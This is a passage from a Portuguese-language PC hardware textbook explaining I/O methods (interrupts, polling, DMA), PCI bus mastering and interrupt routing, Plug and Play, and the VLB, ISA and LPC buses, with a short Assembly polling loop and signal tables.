transferências de 64 bits por segundo. Considere alguns tipos de
interface e o “tempo” entre transferências consecutivas:

Interface Taxa de transfe- Intervalo entre


rência transferências,
medido em
acessos à me-
mória
Teclado 30 caracteres/s 2.600.000
Modem, 56k bps 5 kB/s 16.000
Placa de som 176 kB/s 1.800
Disquetes 45 kB/s 1.700
Paralela padrão 150 kB/s 533
Rede, 10 Mbits/s 1,25 MB/s 256
USB 1.1 1,5 MB/s 200
Paralela EPP/ECP 2 MB/s 40
Rede. 100 Mbits/s 12,5 MB/s 25
IDE, PIO Mode 4 16,6 MB/s 19
IDE, ATA-33 33,3 MB/s 9
Firewire 50 MB/s 6
USB 2.0 60 MB/s 5
IDE, ATA-66 66,6 MB/s 5
IDE, ATA-100 100 MB/s 3

Veja por exemplo o caso do teclado, que fornece uma taxa máxima
de 30 caracteres por segundo (quando usamos o REPEAT). Entre a
chegada de dois caracteres consecutivos, transcorrem cerca de 2,6
milhões de ciclos. Não teria sentido o processador ficar monopolizado
entre a chegada de dois caracteres consecutivos, testando milhares
de vezes se o próximo caracter já chegou. Para isso são usadas in-

142
terrupções. O processador não testa se chegou o próximo caracter,
ele continua executando outras tarefas, e a interface de teclado gera
uma interrupção quando uma tecla é pressionada. Para atender à
interrupção o processador precisa salvar o seu contexto (armazenar o
conteúdo de todos os registradores internos), atender à interrupção e
retornar ao processamento original, o que consome entre 50 e 100
ciclos. Como o intervalo neste caso é de 2,6 milhões de ciclos, vale a
pena para o processador executar outras tarefas e ser interrompido
quando chegar um caracter. Por isso podemos, por exemplo, tranqui-
lamente digitar um texto enquanto o processador de textos faz corre-
ção gramatical ou salva o arquivo automaticamente. Portanto a E/S
programada com o uso de interrupções é um método bem adequado
para a operação do teclado.

Um modem de 56k bps fornece um dado a cada 16.000 ciclos. O uso


de E/S programada com interrupções também é adequado aqui.
Quando chegar um caracter serão gastos entre 50 e 100 ciclos para
atender à interrupção que lê o caracter (ou que o obtém da memória
para transmitir). Por isso tipicamente os modems operam com E/S
programada, sincronizada por interrupções.

A situação da placa de som é mais delicada. Operando com o som de


qualidade máxima, transcorreriam 1800 ciclos entre duas transferên-
cias consecutivas, o que tornaria possível a operação por E/S pro-
gramada, com interrupções. Entre dois dados consecutivos, descon-
tando 100 ciclos para atendimento da interrupção, sobrariam ainda
1700 para outros processamentos. O problema é que estamos levan-
do em conta um barramento de 100 MHz, e quando as placas de som
foram criadas, o barramento usado era o do 386, em versões tão
lentas como 16 MHz e usando 2 ciclos por transferência. Nesse caso
ocorriam cerca de 150 ciclos entre duas transferências consecutivas,
o que tornava inviável o funcionamento por E/S programada com
interrupções, já que cada atendimento de interrupção tem uma latên-
cia de cerca de 100 ciclos. Uma solução seria usar E/S programada
sem interrupções, porém este método não permite que o processador
realize outras tarefas. Por isso foi escolhida para as placas de som, a
E/S por DMA. O processador não se envolve com a transferência,
apenas a ativa no início e é informado da sua finalização, depois que
todos os bytes foram transmitidos ou recebidos. Até hoje as placas de

143
som operam com E/S por DMA, apesar dos barramentos atuais su-
portarem esta operação com E/S programada por interrupções.

Outro caso clássico é o da interface de disquetes. São cerca de 1800


ciclos entre bytes consecutivos, mas nos PCs originais, que faziam
transferências lentas como 4 MB/s, o intervalo entre bytes consecuti-
vos era de pouco mais de 100 ciclos. As interfaces de disquete da
época usavam DMA ou E/S programada sem interrupções (também
chamada de pooling, já que o processador passa os intervalos inter-
rogando a interface para checar se os dados já chegaram). Para
permitir maior desempenho, a IBM optou por utilizar para a sua inter-
face de disquetes, a E/S por DMA, característica que é mantida até
nos PC por questões de compatibilidade, embora a interface de dis-
quetes tenha sido excluída nas MB atuais.

A interface paralela padrão opera nos PCs modernos com cerca de


500 ciclos entre bytes consecutivos, mas nos PCs antigos este perío-
do era reduzido a cerca de 20 ciclos, inviabilizando a E/S programada
por interrupções. As opções viáveis eram DMA e E/S programada por
pooling, e este último foi o adotado pela IBM. Esta interface também
foi excluída nas MB atuais.

A interface de impressora usa interrupções apenas para indicar con-


dições anormais, como buffer cheio, falta de papel e outros erros.
Devido à operação por pooling, o processador fica totalmente ocupa-
do quando envia dados à impressora.

Podemos inclusive notar algumas paradas no processamento normal,


durante a impressão. Interfaces paralelas modernas, operando nos
modos EPP/ECP transmitem e recebe dados a cada intervalo de 40
ciclos, e a única opção viável de funcionamento é a E/S por DMA. A
E/S programada por pooling deixaria o processador monopolizado
durante a impressão.

Interfaces de rede a 10 Mbits/s oferecem 256 ciclos entre dados con-


secutivos (barramento de 100 MHz), ou um número menor ainda nos
barramentos mais lentos. Por isso as interfaces de rede operam com
E/S por DMA ou com E/S programada por pooling. Para não monopo-
lizar o uso do processador ao operar com pooling, as interfaces de

144
rede utilizam um buffer que armazena um bloco inteiro de dados.
Assim consegue uma utilização mais eficiente.

Ao transmitir dados, o processador os coloca rapidamente no buffer e


dispara a transmissão, ficando assim liberado.

A interface de rede vai interromper o processador quando terminar a


transmissão do bloco de dados. Da mesma forma durante a chegada
de dados a interface os armazena no seu buffer e interrompe o pro-
cessador quando o bloco inteiro estiver pronto. O uso de buffers para
acelerar o desempenho, ocupando menos o processador, e interrup-
ções apenas para sinalizar o término da operação, é possível apenas
para interfaces orientadas por blocos, ou seja, que transmitem sem-
pre blocos de dados, como é o caso da interface de rede. Em con-
traste temos os dispositivos orientados a bytes ou caracteres, como
os modems, teclados e impressoras, que requerem atenção individual
do processador para cada byte que transita. Interfaces de rede de
100 Mbits/s podem operar com os mesmos métodos usados pelas
interfaces de 10 Mbits/s.

Dispositivos mais velozes não suportam a E/S programada por inter-


rupções. Devem usar DMA ou E/S programada por pooling. Veja por
exemplo o caso da interface IDE operando em PIO Mode 4. Com
apenas 19 ciclos entre dados consecutivos, tem tempo suficiente para
fazer um pooling, receber o dado, guardar na memória, incrementar
os contadores, testar se chegou o último dado e caso não tenha che-
gado, voltar ao pooling para esperar o próximo dado. A seguir mos-
tramos um trecho de programa (linguagem Assembly) no qual é feita
uma leitura por pooling. O método é usado tanto para interfaces IDE
como para outras que operem desta forma. As diferenças ficam por
conta do número de bytes de cada bloco, dos endereços de dados e
status e do bit indicador de dado pronto.

MOV CX, 512 ; Vai ler 512 bytes


MOV DI, BUFFER ; DI aponta para o destino
POOLING: IN AL, STATUS ; Interroga a interface
TEST AL,BIT ; Testa o bit de dado pronto
JZ POOLING ; Volta se não pronto
IN AL, DADO ; Lê o dado

145
STOSB ; Armazena no buffer
DEC CX ; Decrementa contagem
JNZ POOLING ; Volta se não chegarm 512
FIM: .... ; Continua o processamento

A programação da E/S por DMA é um pouco mais complexa. É preci-


so programar o controlador de DMA indicando o canal a ser usado
(cada canal é ligado a uma interface), o endereço de memória para
os dados e o número de bytes. A seguir a interface recebe o coman-
do a ser realizado. Terminados esses preparativos, o processador
está livre para executar outras tarefas. O controlador de DMA e a
interface farão todo o trabalho. Nos instantes em que dados estive-
rem prontos, o controlador de DMA coloca o processador em HOLD e
faz seu acesso à memória. Terminada a transferência do bloco, a
interface gera uma interrupção para avisar seu término ao processa-
dor.

Interfaces ainda mais rápidas não conseguem operar com E/S pro-
gramada por pooling. Os 9 ciclos entre transferências consecutivas
em uma interface ATA-33 são um período muito pequeno para fazer o
pooling, mesmo operando a 100 MHz. Mais crítica seria a situação
nos barramentos de 66 MHz.

A solução para o problema seria utilizar para esses dispositivos mais


rápidos, a E/S por DMA. Não poderia neste caso ser usado o contro-
lador de DMA padrão do PC. Este controlador opera nos mesmos
padrões do barramento ISA, por questões de compatibilidade.

No IBM PC XT, operava mediante um clock de 5 MHz, e no AT, com


8 MHz. Seria possível utilizar controladores de DMA mais rápidos,
mas não seriam 100% compatíveis com o padrão PC, baseado no
controlador 8237A. Usando este controlador, os acessos à memória
seriam feitos com os 8 MHz do barramento ISA, com ciclos extrema-
mente longos para os padrões atuais, inviabilizando o seu uso com os
dispositivos modernos.

Para usar DMA com os dispositivos de E/S mais modernos, a arquite-


tura do PC deveria ser modificada para incluir um novo controlador de
DMA, ligado diretamente ao barramento do processador, e operando

146
com clocks mais elevados, por exemplo, usando o mesmo clock do
processador.

Tecnicamente isto seria possível, porém ao invés disso foi adotada


uma solução mais simples e mais elegante, que é utilizar o método
Bus Mastering no barramento PCI.

Bus Mastering

O barramento PCI foi construído de tal forma que seus dispositivos


podem operar como Bus Masters.
Um Bus Master pode realizar o mesmo papel que um controlador de
DMA, já que assume o total controle do barramento. É como se cada
dispositivo PCI capaz de operar como Bus Master tivesse um contro-
lador de DMA embutido.

Figura 31

Na figura 31 a sincronização entre o controlador de DMA é feita pelos


sinais HOLD e HLDA. Processadores modernos utilizam controles
semelhantes para fazer este controle, apesar de não serem chama-
dos de HOLD e HLDA.

O barramento PCI não utiliza operações de DMA. Entretanto opera-


ções de DMA que ocorrem no barramento ISA convertidas em trans-
ferências no barramento PCI, nas quais o Master é o PCI/ISA Bridge,
e o Target é o PCI/Host bridge.

A figura 31 mostra o esquema das transferências por DMA e por Bus


Mastering. Assim como ocorre com o DMA, o Bus Mastering não mo-

147
nopoliza o processador. A transferência de dados entre a memória e
um periférico, usando o barramento PCI, tem as seguintes caracterís-
ticas:

a) A interface opera como Bus Master, enquanto o PCI/Host Bridge


opera como Target. O Master pode ser uma interface de rede, uma
interface IDE, uma interface SCSI, uma interface Firewire ou qualquer
outra que esteja preparada para operar neste modo. O PCI/Host
Bridge, atuando como Target, fará os acessos à memória através do
barramento do processador, quando necessário.

b) Mesmo que o barramento PCI esteja operando com seu tráfego


máximo (133 MB/s, com 32 bits e 33 MHz, por exemplo), o barramen-
to do sistema não será exigido 100% do tempo. O PCI/Host Bridge
tomará conta do barramento do processador apenas quando neces-
sário, deixando este barramento livre na maior parte do tempo para
que o processador tenha acesso à memória, realizando seus proces-
samentos normais. Explicando de forma simples, com o barramento
PCI exigindo 133 MB/s e o barramento do processador sendo capaz
de operar com 66 MHz e 64 bits (533 MB/s), estaríamos ocupando
apenas 25% do tráfego total do barramento do processador, que con-
tinua com 75% do tráfego para si próprio. Levando em conta que a
maioria dos acessos são feitos na cache L2, o processador continua
operando normalmente enquanto uma transferência da memória por
Bus Mastering está em andamento.

c) Para evitar que uma transferência monopolize o barramento, o seu


controlador pode suspender temporariamente uma transferência mui-
to longa, dando chance a outros Bus Masters de terem acesso ao
barramento PCI. Transferências suspensas podem continuar de onde
pararam depois que outros Bus Masters foram atendidos.

Plug and Play nos barramentos PCI e ISA

Para que interfaces e placas de expansão funcionem, precisa que


sejam configurados os recursos de hardware a serem usados, e que
sejam instalados os drivers apropriados.
Esses recursos de hardware são:

148
 Endereços de memória
 Endereços de E/S
 Linhas de interrupção
 Canais de DMA

Nos PCs antigos cabia ao usuário ou ao técnico instalador, a configu-


ração desses recursos de forma manual, através de jumpers, micro
chaves ou de programas de configuração específicos para cada dis-
positivo. Um grande esforço da Microsoft, Intel e outros fabricantes foi
feito no sentido de possibilitar a configuração automática desses re-
cursos, sem que o usuário precise intervir. As configurações são fei-
tas de forma automática pelo BIOS da placa de CPU e/ou pelo siste-
ma operacional. Cabe ao sistema operacional providenciar a instala-
ção dos drivers corretos para cada dispositivo instalado.

O barramento PCI é totalmente Plug and Play (PnP). Isto significa


que qualquer dispositivo PCI é beneficiado pela configuração automá-
tica oferecida pelo Plug and Play. Já o barramento ISA não possui
recursos PnP nativos, ou seja, as placas de expansão ISA antigas,
bem como os dispositivos das placas de CPU ligadas ao barramento
ISA (interfaces seriais e paralelas, por exemplo), não possuem recur-
sos de configuração automática.

A arquitetura Plug and Play foi criada de forma que não apenas dis-
positivos PCI possam usá-la. Novos dispositivos ISA puderam passar
a utilizar as mesmas configurações automáticas disponíveis nas pla-
cas PCI. Placas de expansão ISA produzidas a partir de 1995, bem
como interfaces existentes nas placas de CPU modernas e ligadas ao
barramento ISA, também são Plug and Play.

A distribuição de recursos de hardware de forma automática depende


de três fatores:

1) Que exista uma área no sistema que indique quais são os recursos
de hardware disponíveis e quais estão em uso por quais interfaces.
Esta área existe em todas as placas de CPU modernas, e chama-se
ESCD (Extended System Configuration Data). Não existe local pa-
drão para essas informações, mas normalmente ficam localizadas no
BIOS, em Flash ROM, ou no chip CMOS.

149
2) Que cada dispositivo PCI ou ISA PnP informe os recursos de
hardware de que necessita, e que possa ser programado para utilizar
os recursos a ele destinados por um Gerenciador de Recursos.

3) Que os dispositivos não Plug and Play (Legacy Devices, ou dispo-


sitivos de legado) possam ser configurados de forma manual, porém
de forma compatível com os dispositivos Plug and Play.

A arquitetura Plug and Play tem seu funcionamento dependente do


BIOS e do sistema operacional. A figura 32 mostra como o BIOS e o
sistema operacional interagem para acessar os recursos Plug and
Play. Estamos indicando na figura como é feito o acesso a dispositi-
vos de hardware dos tipos PCI e ISA PnP.

Figura 32

Quando o computador é ligado, o Gerenciador Global de Configura-


ções, que faz parte do BIOS PnP, ativa o Gerenciador de Configura-
ções PCI e o Gerenciador de Configurações ISA PnP. Cada um des-
ses módulos comandará suas funções de inicialização, que por sua
vez enviarão comandos de inicialização apropriados para os disposi-
tivos de hardware PCI e ISA.

150
Durante esta inicialização, todos os dispositivos são interrogados
para checar quais são os recursos de hardware necessários (Memó-
ria, E/S, IRQ e DMA).
As funções de inicialização por sua vez pedem ao Gerenciador de
Recursos do BIOS que obtenha através das informações contidas no
ESCD, quais recursos podem ser destinados a esses dispositivos.

Note que alguns dispositivos são inicializados e configurados nesta


etapa, outros são configurados pelo sistema operacional. Tipicamente
os dispositivos que precisam estar ativos antes do boot (interfaces de
disco, por exemplo) são ativados e configurados pelo BIOS.

Dispositivos que funcionam apenas sob o Windows ou outro sistema


Plug and Play podem ser configurados posteriormente por este sis-
tema.

O sistema operacional também tem um gerenciador de configurações


que engloba as mesmas funções do gerenciador do BIOS, porém
com funções mais avançadas. Uma das funções que este gerencia-
dor executa é o BIOS não, é o carregamento dos drivers dos disposi-
tivos.

O BIOS não carrega drivers, apenas distribui os recursos de hardwa-


re. Em função dos dados existentes no ESCD, o sistema operacional
também pode identificar os recursos usados por cada dispositivos.
Pode ainda interrogar os dispositivos que não foram configurados
pelo BIOS e distribuir recursos de hardware (Memória, E/S, IRQ e
DMA) em função dos dados existentes no ESCD.

O sistema operacional também pode empregar utilitários para ler e


alterar as informações do ESCD, bem como reprogramar os recursos
de hardware usados pelos dispositivos Plug and Play (como é o caso
do bom e velho Gerenciador de Dispositivos do Windows).

Como vemos, a arquitetura Plug and Play consiste muito mais em


procedimentos de software que elementos de hardware. Por isso foi
fácil integrá-la às placas ISA de fabricação mais recente.

151
Conexões com outros barramentos

A ligação entre barramentos diferentes é feita através de circuitos


chamados de bridge (ponte). Esses circuitos ficam localizados no
chipset. Como sabemos, o chipset é normalmente formado por dois
componentes:

 System Controller ou Northbridge


 Periperal Controller ou SouthBridge

No System Controller encontramos entre vários outros circuitos, a


ligação entre o barramento PCI e o barramento do processador
(PCI/Host Bridge). No Peripheral Controller encontramos, além de
vários outros circuitos, a conexão entre o barramento PCI e outros
barramentos mais lentos (como o ISA e o LPC).

Uso de interrupções no barramento PCI

O barramento PCI utiliza 4 linhas de interrupção que podem ser redi-


recionadas para as interrupções convencionais do PC (IRQs). Um
componente do chipset chamado Redirecionador de interrupções é
encarregado de fazer este redirecionamento.

Figura 33

A figura 33 mostra como funciona o roteador de interrupções. Che-


gam a ele 4 linhas de interrupção do barramento PCI: R0, R1, R2 e
R3. Este roteador é programado para redirecionar essas 4 linhas para
linhas de IRQ apropriadas.

152
No exemplo da figura 33 essas interrupções estão redirecionadas
para IRQ9, IRQ10, IRQ11 e IRQ12. Esta escolha de IRQs é feita de
forma automática pelo BIOS, mas pode ser alterada através do
CMOS Setup, na seção PCI Configuration. Nela podemos escolher
entre as várias IRQs disponíveis para serem associadas às 4 linhas
de interrupção que chegam do barramento PCI.

As interrupções no barramento PCI podem ser compartilhadas, ou


seja, dois ou mais dispositivos podem usar a mesma interrupção.
Caberá à rotina do sistema operacional que faz o atendimento a cada
interrupção, determinar qual foi o dispositivo que a gerou.

Curiosa é a forma como as linhas de interrupção são ligadas aos slots


PCI. Cada slot tem 4 pinos de interrupção: IRQA, IRQB, IRQC e
IRQD. Entretanto a ligação com as entradas do roteador não é direta,
e sim, alternada. A figura 34 mostra um método típico de ligação.

Figura 34
Conexões de INTA, INTB, INTC e INTD em slots PCI.

A forma de conexão parece confusa, mas é na verdade bastante inte-


ressante e faz com que o uso das interrupções seja distribuído uni-
formemente entre as disponíveis. Sempre que uma placa PCI precisa
utilizar uma única interrupção, deve ser obrigatoriamente a IRQA. Se
uma placa precisar ter mais de uma interrupção pode utilizar as de-

153
mais linhas, mas a IRQA sempre deverá ser usada. Aparentemente
isto faria com que a linha IRQA ficasse congestionada, mas não fica
graças à forma como as linhas IRQA, IRQB, IRQC e IRQD são leva-
das até o roteador de interrupções.

Note que no esquema da figura 34, a IRQA do slot 1 está ligada em


R3, que por sua vez é direcionada para IRQ12. A IRQA do slot 2 está
ligada em R2, que por sua vez é direcionada para IRQ11. A IRQA do
slot 3 está ligada em R1, que por sua vez é direcionada para IRQ10,
e finalmente a IRQA do slot 4 está ligada em R0, que por sua vez é
direcionada para IRQ9. Se cada placa utilizar a IRQA ao mesmo tem-
po, serão geradas interrupções diferentes IRQ9, IRQ10, IRQ11 e
IRQ12.

Quando existem mais de 4 slots PCI, o roteamento obrigatoriamente


faz com que uma mesma entrada do roteador esteja ligada a duas
linhas INTA, de dois slots PCI diferentes. Por exemplo, em uma placa
com 6 slots PCI, as IRQs poderiam estar roteadas da seguinte forma:

R0: INTA/1, INTB/2, INTC/3, INTD/4, INTA/5, INTB/6


R1: INTB/1, INTC/2, INTD/3, INTA/4, INTB/5, INTC/6
R2: INTC/1, INTD/2, INTA/3, INTB/4, INTC/5, INTD/6
R3: INTD/1, INTA/2, INTB/3, INTC/4, INTD/5, INTA/6

Neste caso é comum dizer que “os slots 1 e 5 compartilham a mesma


IRQ” e “os slots 2 e 6 compartilham a mesma IRQ”. Isso estaria cor-
reto se cada slot usar uma única IRQ, mas sabemos que quando
mais de uma IRQ é usada, outras IRQs também serão compartilha-
das.

Vimos que a distribuição das IRQs a serem usadas pelo roteador


pode ser configurada pelo CMOS Setup, de forma manual, ou ser
deixada a cargo do BIOS e do sistema operacional. Podemos checar
através do Gerenciador de Dispositivos, quais linhas estão sendo
usadas pelo roteador de interrupções.

154
Clicando em Computador / Propriedades / Gerenciador de Dispositi-
vos / Exibir/Recursos por conexão / solicitação de interrupção IRQ,
podemos ver a lista das IRQs em uso.

Nem todos os dispositivos ligados ao barramento PCI utilizam as


linhas IRQA, IRQB, IRQC ou IRQD. Por exemplo, as interfaces IDE
primária e secundária, apesar de serem dispositivos PCI, utilizam as
interrupções IRQ15 e IRQ14, respectivamente, que não passam pelo
roteador, sendo ligadas diretamente ao controlador de interrupções.
Da mesma forma, as interfaces USB que também são dispositivos
PCI podem estar diretamente ligadas a uma interrupção, ou então
usarem uma das IRQs disponíveis para os slots PCI.

Barramento VLB

Antes do surgimento do barramento PCI, alguns outros barramentos


foram usados nos PCs, oferecendo taxas de transferência mais ele-
vadas.

O barramento MCA e o EISA foram dois padrões adotados entre o


final dos anos 80 e o início dos anos 90. O MCA (Microchannel Archi-
tecture) era usado em PCs IBM PS/2 e teve várias versões, de 16 e
32 bits, operando a 10 e 16 MHz.

O barramento EISA (Enhanced ISA) foi desenvolvido por diversas


empresas que precisavam de um barramento mais rápido mas não
podiam usar o MCA, que era barramento proprietário da IBM. O EISA
opera com 32 bits e usa clocks entre 6 e 8,33 MHz.

Algumas placas de CPU chegaram a utilizar barramentos locais de


alta velocidade para expansões de memória. Permitiam a instalação
de uma placa especial de memória, mas infelizmente esses barra-
mentos eram proprietários.

Significa que uma placa de CPU com um barramento local proprietá-


rio para expansão de memória deveria obrigatoriamente usar uma
placa de expansão de memória do mesmo fabricante.

155
Como esses barramentos não eram padronizados, não foram usados
em larga escala pela indústria de placas para PCs. A necessidade
deste tipo de barramento cessou com a proliferação dos módulos de
memória, que permitiam obter elevadas capacidades de memória em
pouco espaço.

A necessidade de barramentos mais rápidos voltou a ser grande


quando as placas de vídeo passaram a operar com altas resoluções e
elevado número de cores.

As antigas placas VGA de 16 bits operavam de forma satisfatória em


modo texto, e com gráficos de 640x480 com 256 cores, quando toda
a memória de vídeo ocupava apenas 300 kB. Já com a resolução de
1024x768 com 16 milhões de cores, a memória de vídeo ocupa cerca
de 2 MB. Para transferir integralmente uma tela nesta resolução para
uma placa de vídeo ISA, seria necessário um tempo de cerca de 0,25
a 0,5 segundo.

A movimentação da tela seria extremante lenta, o que criou a neces-


sidade de um novo barramento mais veloz, próprio para a placa de
vídeo.

Foi então que surgiu o Vesa Local Bus (VLB), criado pela Video Elec-
tronics Standards Association. Este barramento era representado
fisicamente por um conector adicional que ficava alinhado com os
slots ISA. Neste barramento era feita a reprodução quase fiel dos
sinais de dados, endereço e controle do processador 486.

Figura 35
Placas SVGA VLB e IDEPLUS VLB.

156
Entre 1994 e 1995 eram comuns as placas SVGA VLB e IDEPLUS
VLB, mostradas na figura 35. Usando uma placa SVGA VLB era con-
seguido um desempenho gráfico bastante superior.

A placa IDEPLUS VLB tinha como vantagem a maior taxa de transfe-


rência da interface IDE, já que suas outras interfaces (seriais, parale-
la, drives de disquetes e joystick) operavam com taxas de transferên-
cia bem menores.

Também foram produzidas placas digitalizadoras de vídeo e controla-


doras SCSI no padrão VLB. Infelizmente o barramento VLB era total-
mente baseado no barramento local do 486.

A chegada dos processadores Pentium e suas placas de CPU equi-


padas com slots PCI, juntamente com a extinção dos processadores
486, fez com que o barramento VLB também caísse em desuso.

157
Os slots VLB foram muito utilizados em placas de CPU 486 com clock
externo de 33 MHz, portanto operavam também com 33 MHz. São
slots de 32 bits, e a 33 MHz oferecem uma taxa de transferência teó-
rica máxima de 133 MB/s. Esta taxa variava de acordo com o clock
externo do processador.

Por exemplo, o 486DX2-50 operava externamente a 25 MHz, portanto


o barramento VLB acompanhava este clock, e a taxa de transferência
resultante era de 100 MB/s. A tabela a seguir mostra alguns proces-
sadores e as taxas obtidas nos seus barramentos VLB.

Processador Clock Taxa de


externo transfe-
e do VLB rência
486DX-33, 486DX2-66, 486DX4-100, 33 MHz 133 MB/s
5x86-133
486DX2-80 40 MHz 160 MB/s
486DX-25, 486DX2-50, 486DX4-75 25 MHz 100 MB/s

Note que a maioria das placas de expansão VLB não suportava ope-
rar acima de 33 MHz. Para suportar 40 MHz era preciso utilizar wait
states que eram programados através de jumpers nas placas VLB.
O barramento VLB tinha várias desvantagens que contribuíram para
que não fosse prolongado o seu uso depois da criação do PCI.

As placas eram extremamente longas e maus contatos no conector


eram bastante comuns. Não oferecia o recurso Plug and Play, como
ocorre com o barramento PCI. O fato de não ter sido criado sob a
liderança da Intel e da Microsoft também contribuiu para que não
fizesse tanto sucesso no mercado.

Barramento ISA

O barramento ISA (Industry Standard Architecture) surgiu no início


dos anos 80. Foi criado pela IBM para ser utilizado no IBM PC XT (8
bits) e no IBM PC AT (16 bits).

158
Apesar de ter sido lançado há muito tempo, podemos encontrar slots
ISA em praticamente todos os PCs produzidos nos últimos anos.
Apenas a partir do ano 2000 tornaram-se comuns novas placas de
CPU que aboliram completamente os slots ISA.

No tempo em que não existiam barramentos mais avançados, as


placas de CPU possuíam 6, 7 e até 8 slots ISA. Depois da populari-
zação do barramento PCI, as placas de CPU passaram a apresentar
apenas 2 ou 3 slots ISA. As raras placas produzidas atualmente que
possuem slots ISA, apresentam apenas um ou dois desses slots.

Os slots ISA são utilizados por várias placas de expansão, entre as


quais:

 Placas fax/modem
 Placas de som
 Placas de interface para scanner SCSI
 Interfaces proprietárias
 Placas de rede

Note que estamos falando principalmente de modelos antigos, pois a


maioria dos fabricantes de placas de expansão já adotou definitiva-
mente o padrão PCI, e não fabricam mais novos modelos ISA.

De qualquer forma, a presença de slots ISA em uma placa de CPU é


útil caso seja necessário aproveitar placas de expansão antigas.

As placas fax/modem e as placas de som foram as que mais demora-


ram para adotar o padrão PCI. O motivo desta demora é que o tráfe-
go de dados que elas utilizam mal chega a ocupar 5% da capacidade
de transferência de um slot ISA.

Já as placas de vídeo, placas de rede, interfaces SCSI e digitalizado-


ras de vídeo operam com taxas de transferência mais elevadas, por
isso foram as primeiras a serem produzidas no padrão PCI.

159
Figura 37
Placas de expansão ISA: placa fax/modem e placa de som.

A figura 37 mostra exemplos de placas de expansão ISA. Observe


que algumas delas utilizam um conector simples (8 bits), enquanto
outras utilizam um conector duplo (16 bits).

Da mesma forma, os slots ISA podem apresentar um único conector


(ISA de 8 bits) ou dois conectores (ISA de 16 bits).

Placas ISA de 8 bits podem ser encaixadas, tanto em slots ISA de 8


bits como em slots ISA de 16 bits. Placas ISA de 16 bits devem ser
encaixadas obrigatoriamente em slots ISA de 16 bits (exceto em ra-
ríssimos casos de placas VGA antigas, de 16 bits, mas que se com-
portam como placas de 8 bits ao serem encaixadas em um slot de 8
bits). Os slots ISA de 8 bits eram encontrados em placas de CPU
muito antigas.

Observe que Barramento ISA não é sinônimo de Slot ISA. O Barra-


mento ISA é um conjunto de sinais digitais que partem do chipset e
do processador, e atingem tanto as placas de expansão, através dos
slots, como circuitos da placa de CPU.

Por exemplo, as interfaces para drives de disquete, interfaces seriais


e interface paralela embutidas na placa de CPU são controladas atra-
vés do barramento ISA, apesar de não utilizarem os slots.

Sinais do barramento ISA

A seguir apresentamos os principais sinais do barramento ISA e suas


descrições. A maioria deles foram originados no barramento de sis-
tema dos processadores 8088 e 80286.

160
DATA0-DATA16 Barramento de dados, com 16 bits
Address 0 – Address 23 Barramento de endereços, com 24
bits
Reset Driver Sinal que é enviado para todo o bar-
ramento quando o processador é
resetado, provocando assim o RESET
dos demais circuitos do computador.
IRQ3 – IRQ15 Linhas de requisição de interrupção.
Através delas as diversas placas de
expansão e demais circuitos podem
interromper o processador. Algumas
linhas não estão disponíveis no bar-
ramento ISA, pois são usadas inter-
namente pela placa de CPU. É o caso
da IRQ0, usada pelo alarme, IRQ1
usada pelo teclado, IRQ2 usada para
conexão entre os dois controladores
de interrupção e IRQ13 usada pela
unidade de ponto flutuante.
DMAREQ 0 – DMAREQ7 Requisições de DMA. Através dessas
linhas uma interface pode solicitar
transferências por DMA. O canal
DMA4 não está disponível no barra-
mento, pois é usado para conectar os
dois controladores de DMA.
DMAACK0 – DMAACK7 Sinais de reconhecimento de inter-
rupção, um para cada canal de DMA,
Real Memory Read Indica leituras na memória, quando o
processador opera no modo real.
Real Memory Write Indica excritas na memória, quando o
processador opera no modo real.
Memory Read Indica leituras na memória, tanto no
modo real como no protegido.
Memory Write Indica escritas na memória, tanto no
modo real como no protegido.
I/O Read Indica leitura em dispositivos de E/S
I/O Write Indica escrita em dispositivos de E/S

161
Terminal Count Indica que foi finalizada uma opera-
ção de DMA
ALE Address Latch Enable. Indica ao bar-
ramento que os endereços são váli-
dos e podem ser capturados pelas
interfaces.
OSC Sinal de 14,38 MHz, usado pelas
placas de vídeo antigas para gerar o
sinal de vídeo composto no padrão
NTSC.
Memory 16-bit Select Indica que o atual ciclo de memória
deve operar com 16 bits.
I/O 16-bit Select Indica que o atual ciclo de E/S deve
operar com 16 bits.
I/O Channel Check Indica que ocorreu um erro de parida-
de na memória.
I/O Channel Ready Usado para introduzir Wait States nos
ciclos em andamento.

LPC - substituto do ISA em placas modernas

As placas de CPU modernas não utilizam mais slots ISA. Ainda assim
possuem circuitos internos que precisam estar disponíveis, apesar de
serem originalmente ligados ao barramento ISA. São as interfaces
seriais, a interface paralela, a interface para drives de disquetes, o
CMOS, a interface de teclado, a interface para mouse, o PC Speaker
e o BIOS. Note que nas placas modernas, com exceção do BIOS,
todos esses circuitos fazem parte do chip conhecido como Super I/O.
Seria preciso manter um barramento ISA interno apenas para a liga-
ção desses dispositivos.

Outro problema é que o barramento ISA possui muitos pinos. Os slots


de 16 bits têm ao todo 98 pinos. Mesmo descontando pinos que nor-
malmente não são necessários para o funcionamento do Super I/O e
do BIOS, o número total continua sendo muito grande. Para resolver
esses problemas, a Intel criou o barramento LPC (Low Pin Count).

162
Este barramento opera com 33 MHz, mas utiliza apenas 13 pinos.
Como é destinado à conexão de dispositivos lentos, não precisa utili-
zar barramentos independentes de dados e endereços. Na verdade
nem precisa fornecer todos esses bits ao mesmo tempo. O LPC
transfere as informações no formato serial, usando um barramento de
apenas 4 bits. Utilizado essas 4 linhas são fornecidos de forma serial,
dados, endereços, comandos, wait states e todas as demais informa-
ções necessárias à sua operação.

Figura 38

A figura 38 mostra o diagrama de uma moderna placa de CPU na


qual não existe barramento ISA.

Observe que o chip South Bridge (no exemplo, o AMD-766) tem como
uma de suas funções, gerar os sinais do barramento LPC, no qual
estão conectados os chips Super I/O e o Flash BIOS.

Da mesma forma existem vários chips Super I/O e várias Flash ROMs
que também adotaram o padrão LPC.

Todos os dispositivos que eram tipicamente ligados ao barramento


ISA operam com baixa velocidade. Sendo assim, o barramento LPC
não tem necessidade de operar com alto desempenho, mas apenas o
suficiente para uma comunicação eficiente com esses dispositivos. Já
que os chips modernos são capazes de operar com clocks bem mais
elevados que os usados antigamente no barramento ISA, o LPC tira
proveito disso, operando com um número de pinos baixo, o que resul-
ta em menor custo e menor complexidade dos seus circuitos.

163
O LPC tem ao todo 13 pinos, sendo 7 de uso obrigatório e 6 opcio-
nais, usados apenas quando é preciso utilizar todos os seus recursos,
o que nem sempre é o caso. Os pinos de uso obrigatório são:

LAD0- LAD3 Barramento serial para comandos, endereços e


dados, todos multiplexados.
LFRAME Indica o início de cada ciclo.
LRESET Reseta os dispositivos do barramento.
LCLK Clock de 33 MHz para os dispositivos do barra-
mento.

Os demais 6 sinais são necessários para dispositivos que usam DMA,


interrupções e gerenciamento de energia.

As operações de leitura e escrita em memória e E/S no barramento


